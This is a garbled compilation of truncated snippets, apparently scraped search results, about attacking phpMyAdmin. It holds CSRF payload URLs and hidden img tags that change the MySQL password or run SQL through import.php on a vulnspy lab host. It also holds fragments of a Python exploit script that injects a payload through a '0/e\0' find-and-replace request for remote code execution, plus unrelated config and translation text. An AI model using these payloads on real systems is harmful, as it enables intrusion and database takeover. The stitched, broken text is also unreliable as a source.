http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A+++++DECLARE+i+INT%3B%0A+++++SET+i+%3D+0%3B%0A+++++WHILE+i+%3C+100+DO%0A+++++...
makes a backup of /etc/phpmyadmin/config.inc.php in /root folder; adds in a mysql pma user / and the table phpmyadmin (if the user "pma" or the table "phpmyadmin" already exists, the script will delete those!); clean temp files, leftover pma.txt (contains password for pma@localhost)...
error = first[:first.find("</code>")]if"already exists"inerror:print(error)else:print("ERROR: "+ error) sys.exit(1)# build exploitexploit = {"db": db,"table": table,"token": token,"goto":"sql.php","find":"0/e\0","replaceWith": payload,"columnIndex":"0","useRegex":"on...
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password %20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" /> # Exploit CSRF - Arbitrary File Write <p>Hello World</p> <img src=" http://7f366ec1afc5832757a402b5355132...
sql = '''CREATE TABLE `{0}` ( `first` varchar(10) CHARACTER SET utf8 NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500')); '''.format(table) # get_token resp = s.post(url_to_pma + "/?lang=en", dict( ...
you can manually add proxy support it's very simple ;)38#s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}39s.verify =False40sql ='''CREATE TABLE `{0}` (41`first` varchar(10) CHARACTER SET utf8 NOT NULL42) ENGINE=InnoDB DEFAULT CHARSET=latin1;43INSERT INTO ...
$strErrorRelationExists = 'Error: relation already exists.'; //to translate $strErrorSaveTable = 'Error saving coordinates for Designer.'; //to translate $strSnapToGrid = 'Snap to grid'; //to translate $strDesignerHelpDisplayField = 'The display field is shown in pink. To set/unset a ...
Those files are available under a drop-down box when you click the database or table name, then the Import tab. If you want different directory for each user, %u will be replaced with username. Please note that the file names must have the suffix ".sql" (or ".sql.bz2" or ".sql...
Those files are available under a drop-down box when you click the database or table name, then the Import tab. If you want different directory for each user, %u will be replaced with username. Please note that the file names must have the suffix ".sql" (or ".sql.bz2" or ".sql...
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A+++++DECLARE+i+INT%3B%0A+++++SET+i+%3D+0%3B%0A+++++WHILE+i+%3C+100...